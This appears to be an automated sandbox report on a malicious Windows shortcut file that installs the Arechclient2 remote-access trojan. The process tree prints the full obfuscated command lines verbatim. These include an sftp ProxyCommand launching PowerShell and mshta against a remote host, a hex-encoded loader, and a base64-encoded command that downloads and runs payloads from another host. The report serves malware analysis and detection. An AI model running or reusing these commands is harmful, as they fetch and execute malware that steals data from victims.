Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CA282A	22_2_00CA282A
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CB89BF	22_2_00CB89BF
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CB6A74	22_2_00CB6A74
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00D00A3A	22_2_00D00A3A
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00C90BE0	22_2_00C90BE0
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CDEDB2	22_2_00CDEDB2
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CACD51	22_2_00CACD51
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00D00EB7	22_2_00D00EB7
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CE8E44	22_2_00CE8E44
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CB6FE6	22_2_00CB6FE6
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CA33B7	22_2_00CA33B7
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00C894E0	22_2_00C894E0
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00C9D45D	22_2_00C9D45D
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CAF409	22_2_00CAF409
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00C8F6A0	22_2_00C8F6A0
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CA16B4	22_2_00CA16B4
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00C9F628	22_2_00C9F628
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CA78C3	22_2_00CA78C3
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CA1BA8	22_2_00CA1BA8
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CADBA5	22_2_00CADBA5
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CB9CE5	22_2_00CB9CE5
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00C9DD28	22_2_00C9DD28
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CA1FC0	22_2_00CA1FC0
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CABFD6	22_2_00CABFD6
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_0135A15D	22_2_0135A15D
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013581C2	22_2_013581C2
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013581C9	22_2_013581C9
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_01359279	22_2_01359279
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013482AF	22_2_013482AF
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013592DB	22_2_013592DB
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_0135A2C7	22_2_0135A2C7
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013579C6	22_2_013579C6
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_01359EB6	22_2_01359EB6

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\71532689\updater.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: String function: 00338B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: String function: 00321A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: String function: 00330D17 appears 70 times
Source: C:\ehcfdbh\AutoIt3.exe	Code function: String function: 00C91A36 appears 34 times
Source: C:\ehcfdbh\AutoIt3.exe	Code function: String function: 00CA8B30 appears 42 times
Source: C:\ehcfdbh\AutoIt3.exe	Code function: String function: 00CA0D17 appears 70 times

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 6352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2050
Source: C:\Windows\System32\mshta.exe	Process created: Commandline size = 6352	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 2050	Jump to behavior

Source: 25.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: Process Memory Space: powershell.exe PID: 1080, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@46/106@10/5

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_0037A6AD GetLastError,FormatMessageW,

20_2_0037A6AD

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00368DE9 AdjustTokenPrivileges,CloseHandle,	20_2_00368DE9
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_00369399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	20_2_00369399
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CD8DE9 AdjustTokenPrivileges,CloseHandle,	22_2_00CD8DE9
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CD9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	22_2_00CD9399

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_0037B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

20_2_0037B976

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00374148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

20_2_00374148

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_0037C9DA CoInitialize,CoCreateInstance,CoUninitialize,

20_2_0037C9DA

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_0037443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

20_2_0037443D

Source: C:\Windows\System32\OpenSSH\ssh.exe

File created: C:\Users\user\.ssh

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\28e44716e636425e8f77e6f595c97e30
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25mpt5jp.cdo.ps1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ehcfdbh\AutoIt3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\ehcfdbh\AutoIt3.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\OpenSSH\sftp.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: sEOELQpFOB.lnk

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\OpenSSH\sftp.exe "C:\Windows\System32\OpenSSH\sftp.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" .
Source: C:\Windows\System32\OpenSSH\sftp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\sftp.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/3VKKE.mp4"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/3VKKE.mp4
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ref095vq842r70_3rd_party_authorisation_form.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1620,i,9604478035381720578,9467704426141136404,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\71532689\updater.exe "C:\Users\user\AppData\Local\Temp\71532689\updater.exe" C:\Users\user\AppData\Local\Temp\71532689\XPoaTdYD.bin
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown	Process created: C:\ehcfdbh\AutoIt3.exe "C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: unknown	Process created: C:\ehcfdbh\AutoIt3.exe "C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\OpenSSH\sftp.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/3VKKE.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/3VKKE.mp4	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3DCF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABF	Jump to behavior
